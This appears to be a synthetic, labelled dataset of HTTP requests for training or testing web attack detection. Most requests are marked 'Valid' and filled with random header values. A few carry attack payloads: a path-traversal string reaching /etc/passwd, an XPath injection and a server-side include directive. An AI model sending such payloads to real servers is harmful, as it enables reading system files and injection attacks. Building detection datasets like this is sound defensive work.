Date: Tue, 28 Dec 04 17:35:48 UTC
ETag: "LOI8cT57uoFoXCB2"
Expect: dwdi2nmo=urhhp
From: nFledhng@FadgstE.de
If-Modified-Since: Thu, 29 Jan 09 06:00:43 UTC
If-Unmodified-Since: Wed, 11 Feb 09 17:10:27 GMT
If-Match: "c@ylNKN.U@Qb5nzw61fk"
If-None-Match: *
If-Range: Wed, 16 Sep 09 11:54:07 UTC
Max-Forwards: 417
MIME-Version: 4.3
Pragma: oarantze=oi
Proxy-Authorization: Digest response="87dB66307E2ef8c477fd16DCFeD9fd69"
Authorization: Basic aWF5aGZvOmdkYWl3
Range: 47781-
Referer: /iecTI/terh/snhtsT.nsf
TE: gzip;q=0.2
Trailer: Referer
User-Agent: y6PMxr5menpi3novi
UA-CPU: Sparc
UA-Disp: 9474,169,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 857x6835
Via: 7.3 219.129.112.208, 8.0 159.43.245.123:644, 4.1 www.l8eSS.html
Transfer-Encoding: identity
Upgrade: geoaa/5.5, tnh/2.0, wawlno/4.1
Warning: 523 www.fcafY9.gif "ilbdchn" "Thu, 14 Aug 08 02:13:15 GMT"
X-Forwarded-For: 170.97.95.101
X-Serial-Number: 4037485153
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 26259
Start - Id: 2348
class: Valid
GET /rAMyl78rU6WKFo1FN/8I/2uskV55q/upjFasQBQa@Mu8irt/o7teucioSEScueromhrt/i8msNml/eierru/a6ld3direid/d7@oJhor8E4cwhereU/2VsfT5xhttpse26MWA.jpeg?oia6=8649208&g3Hieigidapo=rgw&sKHVPwhere1B=shqVq5M%40R%40&ec6aoe0Iieshxa=t&LQprocessing-instructionIorfFVxp_eval=46151922&6EMJd=d4aQdtkb1mwindow.opene&tfbqolE=dsn%3D8shbmaildlibrusrlbody&cp=l51OYPAW8p&le=yR1JPVEtGK6&ae=lth&tmTrdqarhtrria2=lzar&0hraCse=owu&neoerb6sTs4hs=g-WdAn- HTTP/1.1
Host: 167.251.153.201:1
Connection: gs4oilms
Accept: audio/basic;q=0.4, text/*
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.5
Accept-Language: ieeeRf-k, e5ehcuez-omgna, oa6uAr59-ySs;q=0.9, k1A-evbivr, egtbhnr-ia;q=0.1
Cache-Control: no-cache
Client-ip: 235.124.196.175
Cookie: teaU=086380;0UeHM3ietc=nullAformt  a07;iohynttRege=uLoStXComUC
Cookie2: $Version="470"
Date: Mon, 12 Mar 07 11:40:47 UTC
ETag: "jJY3s4lA3D8jGdDOZj"
Expect: 100-continue
From: eau5Sr@xrui3aws.st
If-Modified-Since: Fri, 26 May 06 10:53:27 CET
If-Unmodified-Since: Sun, 24 Jun 07 24:36:31 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 02 May 04 08:29:07 CET
Max-Forwards: 654
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest response="32CC03ccCD2C4F02bb800C8DE1CCEbDB"
Authorization: NTLM YW5hZWJqZnRrdG9jUHJxc3Q3bE5jdGQ2ZDFuaWdkZGV0aDN6YUhpbHNo
Range: -6000,-150
Referer: /ytyhiiss/hstaaeuI/diiaili/aYect.pdf
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.3 (X11; U; Unix 7.3; aS-2n; rv:1.4.1) Gecko/30477809
UA-CPU: PowerPC
UA-Disp: 6863,178,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 1640x452
Via: 0.1 16.208.232.220, FTP/1.7 13.55.140.169:11674
Transfer-Encoding: gzip
Upgrade: 74si/9.9, ixt/2.4, jarRcm/9.9, eiC/2.5
Warning: 884 73.36.206.89 "yeelewkm" "Sat, 05 May 07 13:44:17 GMT"
X-Forwarded-For: 9.20.198.184
X-Serial-Number: 7123081582615631
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 2348
Start - Id: 1766
class: Valid
GET /ei/efN2iAr/nsmnsthtiuqnelp/ankecc/Khtacces0e2ftpuVA0NKK/goeevm/bJxF8-zGJ4scYPPw/@allG7QRuWo/XcUjSEvX-RXBb/ly0lsl/thJiNwrOG0iwePEMhXM.htm?-BEHBxcmaT5E=21&xhhavingFfs=%24rtq+lrcprmo+7o6wt%28&eleeaIra=4960380578&emsnsa=535349&tm0t2cEiahj=l%40cU4rnR2V2u&Ef=gIrh&cotblmojlac=eeor&isde=as&i5r8idEykwtV=onoeempt&ijdtoviM=oeau HTTP/1.1
Host: 26.18.169.204
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: eso-p, ts6yuhb-ie;q=0.0, 8i-sen1anor;q=0.9, tbnte-sanl9c, shsosmh-aap
Cache-Control: no-store
Client-ip: 80.173.254.54
Cookie: 6ssptat=1864;wkantacotcd2Ca4=ibinD;nb=ud<et)n[&
Cookie2: $Version="36"
Date: Wed, 10 Jun 09 22:03:37 UTC
ETag: W/"7GnAgn5dfI2h2vH5"
Expect: 8RdKw
From: hoiiT@iran.org
If-Modified-Since: Mon, 11 Sep 06 14:18:27 UTC
If-Unmodified-Since: Mon, 10 Apr 06 11:46:05 GMT
If-Match: *
If-None-Match: "M9zA6IDyfNRyZdo"
If-Range: Fri, 16 Oct 09 08:29:45 CET
Max-Forwards: 11
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: NTLM RXBldG1hemFldHVvNm5uNDhwZW9hdWVzb2l0ZXljVHRidGg=
Range: 2506-
Referer: http://www.cti3g.org/Hrii/sao95o86.jpeg
TE: deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.5 (Machintosh; U; Mac OS X 0.4; ef-9p; rv:2.3.4) Gecko/25401909
UA-CPU: PowerPC
UA-Disp: 8023,517,8
UA-OS: WinNT
UA-Color: color8
Via: 3.3 www.4fmtthod.jpeg:0
Transfer-Encoding: jnEek; nitnOP=ssere3Ma
Upgrade: idOaS/2.5, htun/6.1, alo/1.0, cCe/9.8
Warning: 139 78.74.97.56:3343 "baAves6intsOfariudt" "Tue, 24 Nov 09 11:16:38 GMT"
X-Forwarded-For: 162.29.213.245
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1766
Start - Id: 16204
class: Valid
GET /nJG/erv/o9th/betweenXiYd9/eZQb309e0SsEP/ndIniahieiidmor/4Bcscidhgip@5MAE8ET/39I1JAaQxI_R/ohderlrorsoi/dsz1sosZB9.tiff?hi86o2tkp=%27gonevvYxp_ HTTP/1.1
Host: www.9tehhw.de:80
Connection: byyMenht
Accept: video/*;q=0.1
Accept-Charset: iso-10646-ucs-2, x-mac-chinesetrad, iso-2022-jp;q=0.2, x-mac-cyrillic
Accept-Encoding: compress;q=0.6, identity, gzip, identity
Accept-Language: *
Cache-Control: min-fresh=838
Client-ip: 4.87.201.114
Cookie: U7hEfvbscriptB=dgcs2dttetx2
Cookie2: $Version="462"
Date: Sun, 16 Oct 05 06:35:42 UTC
ETag: "YTutl-x2WB8mPoGb@L"
Expect: ttov=si6g
From: oltae@ieknifNr4.org
If-Modified-Since: Mon, 21 Jun 04 05:22:04 UTC
If-Unmodified-Since: Tue, 11 Mar 08 14:04:32 UTC
If-Match: "lANYkBkd3DL32j@i_"
If-None-Match: "AVRRm4rSc-i4qwEQXyt"
If-Range: "dBcSFOryH8C2miEux7"
Max-Forwards: 38
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Digest qop=taoadOn
Authorization: ei9oOr Reap51e=Eqcl
Range: 2-
Referer: /iirkaeoa/oimuee.jpeg
TE: chunked,trailers
Trailer: Max-Forwards
User-Agent: n2AN8M http://www.tuniazk.fr
UA-CPU: PowerPC
UA-Disp: 6483,2331,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 846x8936
Via: HTTP/7.9 www.6eniefsn.html
Transfer-Encoding: deflate
Upgrade: tnl/8.4, hvmlz/2.3, sn2fh/0.4, tEir/3.1, eEcar/0.7
Warning: 562 www.72rhlemd.png "OanfqmoOtceaolig" 
X-Forwarded-For: 113.16.19.192
X-Serial-Number: 1816915028
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16204
Start - Id: 27430
class: Valid
GET /Mn4jOps2hytnhhviT5/50RNr-VWT.qO/azmcasutn6rqseb/xtermfN2GDOWBU/oesk/xBvrXeCkkxf1Ct2/bk7BeCw_tN2/n7tf/lf/aDnK./necaht.aspx?w9ooommelbshta=18C&4aeNgccdilfeae=7881&QdN@kEmS=catandoall%7Eiiyd2r7%26Eetr&shvEf6r=se&e7gin=i4oath&att=flkar.&iihnAdlyEht=usr%3Bl3n3nc&Pkg6NffX8U=719793 HTTP/1.1
Host: www.ximn6uv.be
Connection: eNwno
Accept: image/png, video/*;q=0.1, text/html;q=0.6
Accept-Charset: windows-1257;q=0.1, iso-2022-jp, big5;q=0.8
Accept-Encoding: 
Accept-Language: loisz-ehmo, rj-tyums, hwtqah-p, mdmcj1d-nrepole, wohfee-id7dSgol
Cache-Control: no-store
Client-ip: 241.197.1.253
Cookie: DsNvbscriptTy=Mlsfhfsact;bmulmtsvlto=e1AiM;NrtnnudMtpoh=nrlocation;w30imeTEmnnEoa=xa@zgDFuNhy;TJnetf=008;KkPTF3X=ice4frdiwsroeleno5
Cookie2: $Version="33"
Date: Wed, 18 Apr 07 08:00:21 UTC
ETag: W/".1Va5u1mSyZDtfww6p."
Expect: 100-continue
From: mkpuh@Norr.org
If-Modified-Since: Thu, 18 Aug 05 01:52:24 UTC
If-Unmodified-Since: Mon, 15 Aug 05 22:16:04 CET
If-Match: *
If-None-Match: "h-jhpZ1flJsVwIWgg4"
If-Range: "MEmeRFK4PP.XYkQf67"
Max-Forwards: 551
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: htslms lbatnele=Hahtt
Authorization: NTLM R2dydG9ydGNlZWFvbmFlcmVhRWl0dDZ0aW1kY2ZhaWVzZUF0VQ==
Range: 72-
Referer: /tnesaiSm/gbeLhIbu/otktly.msf
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: dsrnomNoenHtH
UA-CPU: x86
UA-Disp: 2797,148,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 759x1141
Via: 5.0 www.aress.js:6, 4.1 220.170.200.38
Transfer-Encoding: ttsia; Nueth=eoaeru
Upgrade: J9ei/7.0
Warning: 822 www.aJHeb.gif "Ee3Jmyqt1htasneg" 
X-Forwarded-For: 109.233.98.137
X-Serial-Number: 29844122
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27430
Start - Id: 14516
class: Valid
GET /svfWFBFt9X6TNXAC/ormzw2/pNb5-DE_xVfSm2RB/Hop@Hpassthru29Tcm/su/7CvIeLWpwvYz1nS1/axeesaphtarnbwaa/WainywhtToe/aDylhUA@/nSRKjd1Xq.NfQm4IZzh.mdb?aeha=Nne%28o&l4lhnsuooh=5zVxA&sat1rnee=+h%29+&s0y8uptHlrW2b=krrpsadmin&JZJXg=ul9l&iado7nre0=4414&tiittieh19=o4%5C4et9Rpse&vshkeco5ete=nAiietriib&espaaZrVe8r5=90&tpheos7iyt=ooyiaeaT&wy4tKDeHhhoOy=tmh HTTP/1.1
Host: 114.215.134.248:2062
Connection: close
Accept: */*
Accept-Charset: ks_c_5601-1987, x-mac-roman, iso-8859-9, x-mac-korean;q=0.0
Accept-Encoding: 
Accept-Language: slaj-coszgeC, glqeuzal-nw
Cache-Control: max-stale=48
Client-ip: 119.245.171.52
Cookie: 7afpnnasbmannw=7;rieTttesi=aX@T.Rly;osnnetnev8nddie=o:U
Cookie2: $Version="47"
Date: Thu, 01 Sep 05 12:09:58 CET
ETag: "rRmqwhf@rbp5lVhHR"
Expect: 100-continue
From: ateo@totu.fr
If-Modified-Since: Wed, 10 Mar 10 12:50:44 UTC
If-Unmodified-Since: Wed, 21 Jan 09 17:17:17 GMT
If-Match: *
If-None-Match: "G_j74Q.2qs7Cyq1307"
If-Range: Thu, 03 Mar 05 17:44:16 UTC
Max-Forwards: 3
MIME-Version: 1.4
Pragma: t=z7jechh
Proxy-Authorization: NTLM cnBybUlpZmJpaW1lMnNua3Rhb2hpMHBhclRtdEV0c25zbVQ3
Authorization: Basic SWc5N201YWE6aXRQYw==
Range: 4019-22,-23,269-5
Referer: http://www.gen7e.com/r4ha/idcmlese/pnecjra/ost3hrG.jpg
TE: trailers,trailers,gzip
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.9 (Windows; U; Windows NT 9.5; ea-er; rv:9.9.8) Gecko/71791244
UA-CPU: StrongARM
UA-Disp: 866,9515,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 3486x145
Via: 3.1 www.lknds.css
Transfer-Encoding: deflate
Upgrade: ybp/8.9, iTtr2/2.5, fay5/2.8, soboni/1.5
Warning: 286 www.onba2h.tiff "okewrt0tac" "Sun, 08 May 05 11:09:41 GMT"
X-Forwarded-For: 129.8.69.87
X-Serial-Number: 01337
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14516
Start - Id: 46154
class: PathTransversal
GET /txmYrH/hQBlY/deleteY.4MLtp3/ts2tipoOeswoo/m9J4YyTKc/0A93T/cw92P3a7hKRUo5q/rlheeswepraR.gif?bruogda=75674&dwssz=oereoptb6he&childgClocationGca=2&atle1Nfotjitdi=rINYa&tniqAontf=byqC&tshhwamsa9atnhj=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html HTTP/1.1
Host: www.caene.org:80
Connection: keep-alive
Accept: image/png;q=0.3
Accept-Charset: us-ascii, cp-936, iso-2022-jp
Accept-Encoding: *
Accept-Language: inrgt-ttdeepeO, 8tOcos2e-boODr, eycw-c;q=0.2, vasodca-nygip;q=0.6
Cache-Control: only-if-cached
Client-ip: 172.17.95.67
Cookie: ihi=24;tr8rorinqsta= aeeee$|Ka;tpol=576034;o9s=i ;eeia9Jlst=25583186
Cookie2: $Version="64"
Date: Tue, 05 Jan 10 11:30:12 GMT
ETag: W/"j@21uhwKhpqx6OGBZVZ"
Expect: 100-continue
From: ehreer@1nwhcp.uk
If-Modified-Since: Tue, 21 Dec 04 24:32:31 CET
If-Unmodified-Since: Tue, 12 Oct 04 18:55:33 CET
If-Match: "T6doRXFCUyPO3O2jl"
If-None-Match: *
If-Range: "hdsuQGvVJvKBzVboOCI"
Max-Forwards: 88
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest username="ogaE"
Range: 542-,61-,33-
Referer: http://www.nRIpni.uk/oashp.bin
TE: trailers,chunked;q=0.1
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.8 (compatible; wsuohoge; SunOS sun4u; oOy5c7e6hi; zAnD; oAie)
UA-CPU: Sparc
UA-Disp: 5013,9581,32
UA-OS: Linux
UA-Pixels: 9278x723
Via: 6.0 www.nslvg.png, HTTP/8.7 236.214.149.224, hrel/6.1 www.aoEJee.png
Transfer-Encoding: deflate
Upgrade: etn/2.1, heape/0.1, hIsen/6.7, eUiJr/1.4, ehAnb/3.2
Warning: 823 25.141.143.47 "taoks5" "Fri, 20 May 05 04:28:26 GMT"
X-Forwarded-For: 90.173.143.30
X-Serial-Number: 678023085
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46154
Start - Id: 21451
class: Valid
GET /y_n9/kEd/es.bin?areet=9515089149&ohtoa=3713154&h6s=z1tere+ri&ylmuefh3Slobata=NenteDyrmoum HTTP/1.1
Host: 118.222.251.35:80
Connection: keep-alive
Accept: text/*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: vinynsh-ioEw;q=0.7, zehrdQts-n, Ln-4uxeNo;q=0.4
Cache-Control: max-stale=9
Client-ip: 91.48.79.53
Cookie: voloa=t09Z7gl4;uceereutidn7o=eKaXb-hYi;WVlvpGEdCwinnt=proq
Cookie2: $Version="0"
Date: Fri, 28 Dec 07 12:38:58 CET
ETag: W/"g@T.Lgd__-SLRN0z6@U"
Expect: oteA=anomr
From: eaheebse@4eGrkw.uk
If-Modified-Since: Thu, 16 Oct 08 24:26:55 CET
If-Unmodified-Since: Wed, 14 Oct 09 21:54:41 GMT
If-Match: "FtJFw3Z9NZCLCu5"
If-None-Match: "k75.NQTjSALi3M."
If-Range: "pJBrAQYY6b7tTqITvIs"
Max-Forwards: 761
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: NTLM eXBoc2toeG9BbnRsbGVkZmFiZTJvcnJpTGNyNVljdzJsZW5hdXV1bnJuRTByb0U=
Authorization: nest eeciete=ewh3oo
Range: 21333-1766,-00,-67436
Referer: /Eftrtd.jpg
TE: trailers
Trailer: TE
User-Agent: Mozilla/2.5 (X11; U; Linux i386 8.2; hw-iz; rv:5.1.0) Gecko/31937910
UA-CPU: Sparc
UA-Disp: 738,354,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 2698x837
Via: FTP/8.2 52.68.17.91, 4.9 www.s3oo2saa.png
Transfer-Encoding: qlso
Upgrade: ree/2.8, tsn/6.2, gd3uq/8.4, 4fta/7.3
Warning: 868 www.psaerr.png "ieSephnp" 
X-Forwarded-For: 153.129.48.252
X-Serial-Number: 321441502
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21451
Start - Id: 49240
class: XPathInjection
GET /vAJCqpB/aiclv.html?rOO9=965021&mGIZWU=7oMvx&ha6ntip=dm9aeeiod&M7craqas=fBpmVjYu-&ss4s=70+++or+++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or+++++300%3D&ydlPxalp=c8e HTTP/1.1
Host: www.vnDat.it
Connection: close
Accept: image/jpeg;q=0.7, application/*;q=0.7, text/plain
Accept-Charset: euc-cn;q=0.9, isiri-3342, euc-jp;q=0.3, euc-jp
Accept-Encoding: *;q=0.0
Accept-Language: r1Yrio-eVdao, spohc-Rhr;q=0.1, hO-ehzs0, ii-ret, thaw50a-at4
Cache-Control: no-store
Client-ip: 255.140.114.178
Cookie: micaioerygcofn=ur
Cookie2: $Version="1"
Date: Tue, 19 Jul 05 21:00:09 GMT
ETag: "NpafSIlL4tWnyPvu"
Expect: 100-continue
From: ebT3@niat.fr
If-Modified-Since: Sat, 07 Jan 06 05:13:57 GMT
If-Unmodified-Since: Thu, 29 Jul 04 23:28:14 UTC
If-Match: "B3dIScTW0-631oqrVre"
If-None-Match: *
If-Range: Wed, 26 Aug 09 07:11:13 GMT
Max-Forwards: 6
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: NTLM ZGhvaW5yZWlhdG1lcmV5Z2luam9Ub29hY29sNWxkbmgzT2VpcWVudGR2dGZTcw==
Authorization: NTLM Y2lpbmNhb2RyazRsbnM4d2FUbm5uZXVlejVpdDJpcnJ2RW1h
Range: -364650
Referer: http://qnahp.de/uirdask/oda9e/zqlt/eige/eHpe.mspx
TE: trailers
Trailer: TE
User-Agent: Mozilla/9.8 (Machintosh; U; Mac OS X 3.1; we-sy; rv:4.8.2) Gecko/24134449
UA-CPU: 68000
UA-Disp: 2447,4165,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 718x8492
Via: 3.1 www.rnM9mblo.htm
Transfer-Encoding: compress
Upgrade: ja8xa/5.6
Warning: 707 66.170.198.17:64394 "nmdeaEo7jen" 
X-Forwarded-For: 159.181.91.193
X-Serial-Number: 15070707581939695
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49240
Start - Id: 14007
class: Valid
GET /nK3eMX-Q2U/ypSWC5kxEG/iDuneibnZguOs/5xUXGj_dsh0/dniatnsihhrosa/aa4.jsp? HTTP/1.0
Host: www.olndn3dc.st
Connection: redaald
Accept: text/*
Accept-Charset: windows-1250
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: aaklnaqi='od0'
Client-ip: 134.74.211.38
Cookie: aNngnapsUnyusss=qo nEtall;raWoenKnei8mar=ef);uaos=hb:;lDRTlxidV=79823338;od90ogstr=591
Cookie2: $Version="0"
Date: Fri, 28 Aug 09 08:10:45 CET
ETag: W/"N0G51K5pUBajmD3E65Xy"
Expect: hbsstpl
From: aeeaqe@ea10ef.st
If-Modified-Since: Sun, 22 Jan 06 15:13:31 GMT
If-Unmodified-Since: Thu, 02 Feb 06 23:29:56 UTC
If-Match: "hL8fNgPuv2WygUKc"
If-None-Match: "Vbv0NPnXa7jdF6Jc@."
If-Range: Mon, 03 Jul 06 12:59:15 GMT
Max-Forwards: 7
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: ooxa Emonh=aeiur
Authorization: Htha sdmr=ga6ato
Range: 986633-,-445,64-7061
Referer: http://icrc.com/nyysn/9m9nasA.bin
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: dqxobin
UA-CPU: 68000
UA-Disp: 7939,4903,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 190x1907
Via: FTP/1.9 www.iniX.jpeg
Transfer-Encoding: compress
Upgrade: saeetn/9.8, aenG/0.0, ras7nd/2.5, zvui/3.1
Warning: 949 173.10.111.220:0 "1Outi0Ptecll" 
X-Forwarded-For: 157.125.101.111
X-Serial-Number: 738264285065396
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 14007
Start - Id: 39270
class: SSI
GET /YiBV/nvwovaeonaRe/42v.php?ofRtaty1sd=07&k.-c77S=eo%29&amtotso=%3C%21--%23echo+var%3D%22date_gmt%22--%3E HTTP/1.1
Host: 70.10.215.64
Connection: close
Accept: image/*;q=0.7
Accept-Charset: iso-2022-jp;q=0.3, macintosh, ks_c_5601-1987
Accept-Encoding: 
Accept-Language: e-9ouiel9, nmlo3ho-hlla;q=0.7, Uih-Wry7oR5, 0anexo-e;q=0.5
Cache-Control: min-fresh=876
Client-ip: 37.187.22.142
Cookie: dntyRiqeeolrl=aw_;rdqevr4tanibyh=9377;des5tchot=03429728;eheoe2if=)tr8oeid2rt4;Af
Cookie2: $Version="1"
Date: Thu, 22 Feb 07 23:04:26 CET
ETag: W/"9-rc_VTbp3Y9zuJ3"
Expect: tGnf1g=pja2z2le;grncwlo=gs7s
From: erhT@noAtt.uk
If-Modified-Since: Mon, 29 Mar 10 02:42:40 UTC
If-Unmodified-Since: Sat, 31 Mar 07 17:41:22 CET
If-Match: *
If-None-Match: "RwjmJJj2ALUSTD7yxPQz"
If-Range: "yN36kgKImrjW6fC7"
Max-Forwards: 7
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM dGs2bnNEZXBhN2h0dG5ldlFCbnlkQXN0c25tcmFrb1B0YXVzbXlJbm9paFBsaTE=
Authorization: lwtaEj 30vns2i=tbjhtpo
Range: 103-767,422854-
Referer: /edsre/shtia/inaer/dtnsIne.jsp
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/9.5 (compatible; MSIE 3.7; Win98; 1stP; nnlnuT7Ii)
UA-CPU: MIPS
UA-Disp: 3603,824,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8684x662
Via: 2.4 www.Yoialds.gif, 5sejix/1.3 120.205.5.91
Transfer-Encoding: compress
Upgrade: etsi/0.2, 42Nn/6.7
Warning: 014 58.200.111.202 "ltrIo" 
X-Forwarded-For: 237.101.171.41
X-Serial-Number: 04901
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39270
Start - Id: 18957
class: Valid
GET /atnsdindso/at7nnSasn/ancilicEeWhdcensrcf.css?spx=e+urAk%28&gebsd=5669&corRat=4688458&geoh=Wcsx&ntnns=0983691&euBaimorbot9hdi=u%40axdropsHteval304ztt%7Cetcall&rshi=14&stdinvZosX7I=5319504457&a1lHZshe=469&qhbhnit=dnu&oiaaadssgwocgnr=9961 HTTP/1.1
Host: 122.220.30.24
Connection: close
Accept: */*
Accept-Charset: windows-1251, x-mac-korean, x-mac-hebrew, x-mac-roman;q=0.6, ks_c_5601-1987
Accept-Encoding: *;q=0.5
Accept-Language: aei-orgz, ed-yie8;q=0.8
Cache-Control: max-stale
Client-ip: 248.148.61.44
Cookie: ttFotue9lxtd=doc;Anec6h=ti>;tp9Tmot4lcnr=aaS-;trnhcnnaeh=sdeos1adus7ug5Eraq;omoskftstn=na9b0aitvh;r1=34209
Cookie2: $Version="358"
Date: Sat, 13 Aug 05 02:42:56 CET
ETag: "Kn@@1SqtHrS32xnqNA"
Expect: 100-continue
From: yhhrcnd@rmltnrr.ch
If-Modified-Since: Thu, 20 Dec 07 23:11:24 GMT
If-Unmodified-Since: Sun, 22 Apr 07 12:27:06 GMT
If-Match: "EGLJCsHgKHHth7@avH"
If-None-Match: *
If-Range: Tue, 15 Aug 06 21:58:25 GMT
Max-Forwards: 00
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: deni BgeCdtco=owltyT
Range: 1-095
Referer: /E9snh4j/6ieaAt/tthrnhzh.cgi
TE: trailers,deflate;q=0.2,chunked;q=0.9
Trailer: Authorization
User-Agent: Mozilla/9.7 (X11; U; SunOS sun4u 7.1; rt-Ec; rv:9.5.7) Gecko/07586427
UA-CPU: 68000
UA-Disp: 2836,0618,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 2163x0680
Via: a9loAe/5.5 92.167.69.5, HTTP/8.4 www.9mit.png:52, HTTP/3.3 www.mtedn.png
Transfer-Encoding: gzip
Upgrade: duxls/6.1
Warning: 274 103.50.6.94 "Nnxruknc1" "Wed, 14 Dec 05 19:16:26 UTC"
X-Forwarded-For: 166.105.2.220
X-Serial-Number: 27260320301
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18957
Start - Id: 4885
class: Valid
POST /i32l00wuxnzRYan00X/an/eet8eheaomhurcrrsous/KYEL/ivDeay.exe? HTTP/1.0
Content-Length: 205
Content-Language: aehp
Content-Encoding: identity
Content-Location: http://oaHv.be/wq1ri/amco1s/I4nan/eAOats.php
Content-MD5: ZTRybWVlamZpb0dmMHlhYg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 03 Oct 07 21:13:25 CET
Last-Modified: Tue, 16 Mar 04 13:31:28 CET
Host: www.oiibe0.be
Connection: close
Accept: text/*;q=0.9
Accept-Charset: *;q=0.4
Accept-Encoding: deflate;q=0.6
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 29.17.35.192
Cookie: iBOb=4851420;31fwacueNkndl=;hz0ftp/;elesUKartEu=oGx;n8c=31045;nVoBd5_S@=Ge>letc
Cookie2: $Version="4"
Date: Tue, 24 Nov 09 22:40:26 UTC
ETag: "dcMVOniXcAScfLf"
Expect: highc=c1eo;nodt1=DeEe
From: itds3@bta1toaaio.be
If-Modified-Since: Wed, 17 Oct 07 14:47:44 CET
If-Unmodified-Since: Fri, 21 Oct 05 20:09:26 GMT
If-Match: *
If-None-Match: *
If-Range: "aOyNGezDFvkoOjf"
Max-Forwards: 29
MIME-Version: 4.1
Pragma: nmif=Awr9coua
Proxy-Authorization: Digest qop=auth
Authorization: Digest nonce
Range: 700323-3,56039-78431,91-43
Referer: /waLnOo/opm8/tpH4g/iasuaal.sh
TE: trailers
Trailer: Referer
User-Agent: 2Nerlmenae (spmKOLP; nRUzNgG; lka_LWWpZ)
UA-CPU: Sparc
UA-Disp: 085,1074,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 1672x4809
Via: FTP/9.0 www.exeapsn.tiff, 0.4 www.c6ddVeT.shtml
Transfer-Encoding: deflate
Upgrade: wsry/3.9, n3Lf/9.4, otoco/2.2
Warning: 057 www.e7xShmti.shtml "doelar6lifleayg" "Sat, 14 Jan 06 16:16:51 GMT"
X-Forwarded-For: 166.37.58.71
X-Serial-Number: 8226641933053
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

QdVJlIWMEI=421&hpriahHuewssg=q_s.mjlYVK&nrel3r23c=ny(uR&zup=teN:rBrnded&g7rl5=ilra&fDwget8YSIY_or=2706092&Aeienitndre8re=96&isEvaxylh=a1e7adw8Bhh&demi=RouwoatiiR&hrMnwiide=67391&eatlbmtngWb=eZJKlYUOze.

End - Id: 4885
Start - Id: 35786
class: XPathInjection
